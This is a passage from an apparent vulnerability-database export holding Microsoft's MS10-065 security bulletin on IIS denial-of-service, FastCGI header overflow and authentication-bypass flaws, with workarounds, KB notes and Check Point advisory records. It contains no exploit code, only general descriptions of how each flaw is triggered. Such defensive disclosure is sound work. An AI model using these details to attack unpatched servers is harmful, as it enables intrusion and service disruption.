Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin has been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. 
For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the September bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tIIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\tRequest Header Buffer Overflow Vulnerability - CVE-2010-2730\tDirectory Authentication Bypass Vulnerability - CVE-2010-2731\tAggregate Severity Rating\r\nInternet Information Services ASP\t \t \t \t \r\n\r\nInternet Information Services 5.1 on Windows XP Service Pack 3\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows XP Professional x64 Edition Service Pack 2\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows Server 2003 Service Pack 2\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows Server 2003 x64 Edition Service Pack 2\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 6.0 on Windows Server 2003 with SP2 for Itanium-based Systems\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of 
Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.0 on Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows 7 for 32-bit Systems\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows 7 for x64-based Systems\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for x64-based Systems*\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for Itanium-based 
Systems\r\n(KB2124261)\r\n\t\r\n\r\nImportant \r\nDenial of Service\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\nInternet Information Services FastCGI\t \t \t \t \r\n\r\nInternet Information Services 7.5 on Windows 7 for 32-bit Systems\r\n(KB2271195)\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows 7 for x64-based Systems\r\n(KB2271195)\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for x64-based Systems*\r\n(KB2271195)\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\n\r\nInternet Information Services 7.5 on Windows Server 2008 R2 for Itanium-based Systems\r\n(KB2271195)\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant\r\nInternet Information Services Authentication\t \t \t \t \r\n\r\nInternet Information Services 5.1 on Windows XP Service Pack 3\r\n(KB2290570)\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. 
Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nIIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nA denial of service vulnerability exists in Internet Information Services (IIS) that could allow an attacker who successfully exploited this vulnerability to interrupt service, causing the server to become un-responsive. An attacker could exploit the vulnerability by sending specially crafted URL requests to active server pages on a Web site hosted by IIS.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-1899.\r\n\t\r\nMitigating Factors for IIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nASP pages are prohibited by default on IIS 6.0.\r\n\u2022\t\r\n\r\nThe vulnerability is only exploitable when the ASP script writes parameters from the request in the response.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. 
Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nTemporarily disable ASP on the IIS server\r\n\r\nChange the status for ASP from ALLOWED to PROHIBITED in the IIS manager.\r\n\r\nFor Windows XP and Windows Server 2003\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect Web Service Extensions node under the server name in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nRight-click Active Server Pages in the right pane and select Prohibit.\r\n\r\nFor Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect the server node in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nSelect Handler Mappings in the right pane and double-click AspClassic.\r\n\r\n4.\r\n\t\r\n\r\nClick Request Restrictions, select the Access tab, and click None.\r\n\r\n5.\r\n\t\r\n\r\nClick OK and then click No to disallow the ISAPI extension.\r\n\r\nImpact of workaround. ASP pages will no longer work.\r\n\r\nHow to undo the workaround. 
\r\n\r\nChange the status for ASP from PROHIBITED to ALLOWED in the IIS manager.\r\n\r\nFor Windows XP and Windows Server 2003\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect Web Service Extensions node under the server name in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nRight-click Active Server Pages in the right pane and select Allow.\r\n\r\nFor Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect the server node in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nSelect Handler Mappings in the right pane and double-click AspClassic.\r\n\r\n4.\r\n\t\r\n\r\nClick Request Restrictions, select the Access tab, and click Script.\r\n\r\n5.\r\n\t\r\n\r\nClick OK and then click No to disallow the ISAPI extension.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. If an attacker sends a specially crafted request to a Web server, the server could become unresponsive. The vulnerability does not cause the server to fail or cause any data to be lost, and the server would eventually resume normal operation with a service reset.\r\n\r\nWhat causes the vulnerability? \r\nThis denial of service vulnerability is caused by a stack overflow in the ASP script processing code.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding and automatically restart. During that time, the server would be unable to respond to requests. If the attacker causes the service to restart five times, the service will then fail to restart without administrator interaction. 
Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected service to stop accepting requests.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could send specially crafted URL requests to a Web site hosting .asp pages to exploit this denial of service vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll systems running Microsoft Internet Information Services could be affected by this vulnerability.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that IIS and asp.dll handle specially crafted HTTP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nRequest Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nA remote code execution vulnerability exists in Internet Information Services (IIS) that an attacker could exploit by sending specially crafted HTTP requests to IIS servers with FastCGI enabled.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-2730.\r\n\t\r\nMitigating Factors for Request Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. 
The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFastCGI is not enabled by default in IIS.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Request Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable FastCGI\r\n\r\n1.\r\n\t\r\n\r\nLaunch the Server Manager and edit the Roles.\r\n\r\n2.\r\n\t\r\n\r\nDeselect the CGI check box and click Next.\r\n\r\nImpact of workaround. Modules that depend on FastCGI will no longer work.\r\n\r\nHow to undo the workaround. \r\n\r\nLaunch the Server Manager and add the CGI feature under Web Server.\r\n\u2022\t\r\n\r\nInstall the URL Rewrite module\r\n\r\nYou are protected when this module is installed, whether or not you are using it. For information on URL Rewrite, see URL Rewrite.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Request Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. A remote attacker who successfully exploited this vulnerability could then perform actions on the IIS server with the same rights as the Worker Process Identity (WPI). This identity is configured to be a virtual application pool identity on Windows 7 and Windows Server 2008 R2.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that IIS servers with FastCGI enabled handle request headers.\r\n\r\nWhat is FastCGI? \r\nFastCGI for IIS enables popular application frameworks that support the FastCGI protocol to be hosted on the IIS Web server in a high-performance and reliable way. 
FastCGI provides a high-performance alternative to the Common Gateway Interface (CGI), a standard way of interfacing external applications with Web servers that has been supported as part of the IIS feature-set since the very first release.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nA remote code execution vulnerability exists in the way that IIS handles request headers to IIS servers with FastCGI enabled. An attacker could exploit this vulnerability by creating a specially crafted HTTP request.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWeb servers with FastCGI enabled that host content.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that IIS servers with FastCGI enabled handle request headers.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nDirectory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nAn elevation of privilege vulnerability exists in Internet Information Services (IIS). 
An attacker who successfully exploited this vulnerability could bypass the need to authenticate to access restricted resources.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-2731.\r\n\t\r\nMitigating Factors for Directory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nSites that are not using authentication are not vulnerable to this. There is no elevation of privilege attack vector for sites with only anonymous authentication.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Directory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nInstall and Use URLScan\r\n\r\nURLScan will help protect against a large number of issues stemming from improperly formed URL requests including the publicly described issues addressed by this bulletin. URLScan does not protect your system as comprehensively as either the mitigation code module or the global.asax script below. For information on URLScan, see the TechNet article, UrlScan Security Tool.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Directory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an elevation of privilege vulnerability. 
An attacker could send a specially crafted request to a URL that requires authentication to bypass authentication and execute ASP script to which the attacker should not have access.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that IIS parses specially crafted URLs.\r\n\r\nDoes SSL help mitigate this vulnerability? \r\nThis is a directory bypass vulnerability. Secure Sockets Layer (SSL) does not help mitigate this vulnerability.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker could use this vulnerability to bypass directory-based basic authentication and to access and execute resources that should require authentication.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could send a specially crafted URL to bypass directory-based basic authentication.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWeb services using basic authentication are at risk from the vulnerability.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that IIS handles specially crafted requests to prevent unauthenticated users from accessing resources hosted on the IIS server that should require authentication.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerabilities and Exposures number CVE-2010-2731.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nJinsik Shim for reporting the IIS Repeated Parameter Request Denial of Service Vulnerability (CVE-2010-1899)\r\n\u2022\t\r\n\r\nTravis Raybold of Rubicon West for reporting the Request Header Buffer Overflow Vulnerability (CVE-2010-2730)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. 
For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (September 14, 2010): Bulletin published.", "edition": 1, "cvss3": {}, "published": "2010-09-16T00:00:00", "title": "Microsoft Security Bulletin MS10-065 - Important Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2010-09-16T00:00:00", "id": "SECURITYVULNS:DOC:24752", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24752", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:44", "description": "Authentication bypass, buffer overflow, DoS.", "edition": 2, "cvss3": {}, "published": "2010-09-16T00:00:00", "title": "Microsoft Internet Information Services multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2010-09-16T00:00:00", "id": "SECURITYVULNS:VULN:11145", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:11145", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:51:53", "description": "<html><body><p>Resolves vulnerabilities in Internet Information Services (IIS) that could allow remote code execution if a user received a specially crafted HTTP request. An attacker who successfully exploited this vulnerability could take complete control of an affected system.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-065. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201009.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201009.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS10-065.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your 
computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/> <br/><ul class=\"sbody-free_list\"><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2124261\" id=\"kb-link-8\">2124261 </a> MS10-065: Description of the security update for Internet Information Services ASP: September 14, 2010 </div>Known issues in security update 2124261:<br/><br/><ul class=\"sbody-free_list\"><li>When you install security update 2124261 on a computer that is running Windows XP SP3 and that is not running IIS, the update may seem to install successfully. In this scenario, an entry is added to the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel. However, no files are installed on the computer. 
The files are not cached locally for use if IIS is enabled at a later date.</li></ul></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2271195\" id=\"kb-link-9\">2271195 </a> MS10-065: Description of the security update for Internet Information Services CGI: September 14, 2010</div>Known issues in security update 2271195:<br/><ul class=\"sbody-free_list\"><li>The version of cgi.dll (7.5.7600.16385) that is released in Service Pack 1 (SP1) for Windows 7 and Windows Server 2008 R2 has an earlier version number than the version number of cgi.dll (7.5.7600.16632) that is released in security update 2271195. However, security update 2271195 is contained in cgi.dll version 7.5.7600.16385 that is released in the Service Pack. Therefore,\u00a0no additional action is required by the user.\u00a0</li></ul></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2290570\" id=\"kb-link-10\">2290570 </a> MS10-065: Description of the security update for Internet Information Services Infocomm: September 14, 2010</div></li></ul></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-07-18T18:49:39", "type": "mskb", "title": "MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) could allow remote code execution", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2012-07-18T18:49:39", "id": "KB2267960", "href": "https://support.microsoft.com/en-us/help/2267960/", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:34:05", "description": "IIS is a collection of Internet services packaged with several versions of the Windows operating system. An elevation of privilege vulnerability has been reported in Microsoft Internet Information Services (IIS). The vulnerability is due to the way IIS parses specially crafted URLs. An attacker may exploit this issue via a specially crafted URL to bypass directory-based basic authentication. Successful exploitation of this vulnerability would allow the attacker to access and execute resources that should require authentication.", "cvss3": {}, "published": "2010-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Directory Authentication Bypass (MS10-065; CVE-2010-1899; CVE-2010-2731)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899", "CVE-2010-2731"], "modified": "2016-03-21T00:00:00", "id": "CPAI-2010-262", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T12:35:07", "description": "IIS is a collection of Internet services packaged with several versions of the Windows operating system. A denial of service vulnerability has been reported in Microsoft Internet Information Services (IIS). A remote attacker could use this issue to create a denial of service condition, thus crashing the vulnerable service. 
The vulnerability is due to a stack overflow error in the IIS service resulting from excessive recursion. An attacker may exploit this issue by crafting an HTTP POST request that will cause the server to become unresponsive for some period of time. Successful exploitation of this vulnerability would cause the affected system to stop responding and automatically restart.", "cvss3": {}, "published": "2010-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Repeated Parameter Request Denial of Service (MS10-065; CVE-2010-1899)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899"], "modified": "2014-03-17T00:00:00", "id": "CPAI-2010-260", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-05T00:08:56", "description": "A buffer overflow vulnerability has been reported in Microsoft Internet Information Services (IIS) with FastCGI enabled. IIS is a collection of Internet services packaged with several versions of the Windows operating system. FastCGI for IIS enables popular application frameworks that support the FastCGI protocol to be hosted on the IIS web server. 
A remote attacker could use this issue to execute arbitrary code on an affected system.", "cvss3": {}, "published": "2010-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against Microsoft IIS Request Header Buffer Overflow Vulnerability (MS10-065)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730"], "modified": "2010-01-01T00:00:00", "id": "CPAI-2010-261", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:16:55", "description": "A code execution vulnerability exists in Microsoft Internet Information Services (IIS) when FastCGI is enabled. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process. The vulnerability is due to a heap buffer overflow error when processing an unexpected number of headers in an HTTP request. 
